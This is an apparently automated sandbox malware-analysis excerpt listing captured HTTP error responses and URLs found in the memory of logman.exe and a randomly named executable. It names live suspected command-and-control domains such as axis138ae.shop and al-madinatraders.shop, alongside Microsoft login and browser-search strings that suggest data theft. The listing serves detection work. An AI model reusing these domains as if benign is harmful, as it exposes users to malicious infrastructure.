                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:44 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:46 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=1dd8f356cad07854855386b19d5fe9ef; expires=Fri, 10-Jan-2025 17:44:52 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:52 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=72c6b904c39735c8958616180baef3de; expires=Fri, 10-Jan-2025 17:44:55 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:55 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=d5496703b2e2cd91e435e2cfe33cb86a; expires=Fri, 10-Jan-2025 17:44:57 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:57 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=7078c20c62b822c92d1ce806daae05bb; expires=Fri, 10-Jan-2025 17:45:00 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 234date: Fri, 10 Jan 2025 15:45:00 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFn
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX6
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSF
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000044B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Deacapalla.online
                Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.al-madinatraders.shop
                Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.al-madinatraders.shop/qfbg/
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online
                Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns
                Source: logman.exe, 00000005.00000002.4505185726.0000000004490000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000003E70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.vh5g.sbs/
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: logman.exe, 00000005.00000002.4503848678.0000000002B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: logman.exe, 00000005.00000003.2595229779.00000000078A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: logman.exe, 00000005.00000002.4505185726.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000047DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCk
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
